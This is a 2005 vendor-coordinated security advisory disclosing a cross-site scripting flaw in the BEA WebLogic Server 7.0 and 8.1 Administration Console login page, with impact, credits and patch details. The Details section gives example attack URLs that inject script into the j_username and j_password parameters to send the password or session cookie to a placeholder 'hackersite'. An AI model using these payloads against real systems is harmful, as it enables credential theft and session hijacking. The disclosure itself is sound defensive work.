Application Security Inc. - Securing Business by Securing Enterprise Applications

home

client login

partner login

online store

search:

MOST POPULAR CONTENT

1.	Top Database Security Threats for 2008
2.	Database Security Best Practices for Federal Agencies
3.	PCI Compliance at the Database Level
4.	Forrester WAVE Summary Scorecard
5.	SOX Compliance and Database Security

BEA WebLogic Administration Console login page cross-site scripting vulnerability

May 27, 2005

Risk Level: High

Affected versions:
BEA WebLogic Server 7.0 and 8.1

Credits:
This vulnerability was discovered and researched by Agustín Martínez Fayó of Argeniss for Application Security Inc.

Background:
The Administration Console is a web browser-based, graphical user interface used to manage a WebLogic Server domain. The Administration Console supports a full range of product administrative tasks. A cross-site scripting vulnerability exists in the login page of the Console.

Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user.

The "j_username" and "j_password" parameters in the login page of the Administration Console are vulnerable to cross-site scripting attacks. User supplied input to these parameters is returned without proper sanitization, allowing a malicious attacker to inject arbitrary scripting code.

Below are some examples of the hyperlinks an attacker could use.
Steal administrator's password: http://vulnerablesite:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('http://hackersite/'%2Bdocument.all.j_password.value)" Get the session cookie : http://vulnerablesite:7001/console/login/LoginForm.jsp?j_username=""onBlur="window.open('http://hackersite/'%2Bdocument.cookie)" or http://vulnerablesite:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('http://hackersite/'%2Bdocument.cookie)"

Impact:
Attackers can steal administrator's session cookies and password, thereby allowing the attacker to impersonate the valid user.

Workaround:
There is no workaround for this issue.

Vendor Status:
Vendor was contacted and a patch was released.

Fix:
For BEA WebLogic Server and WebLogic Express 8.1 upgrade to Service Pack 4. Apply the patch on top of it located at ftp://ftpna.bea.com/pub/releases/security/CR202495_810sp4.jar on top of the service packs.

For BEA WebLogic Server and WebLogic Express 7.0 upgrade to Service Pack 6. Apply the patch located at ftp://ftpna.bea.com/pub/releases/security/CR214457_700sp6.jar on top of the service packs.

Links:
BEA Advisory: http://dev2dev.bea.com/pub/advisory/130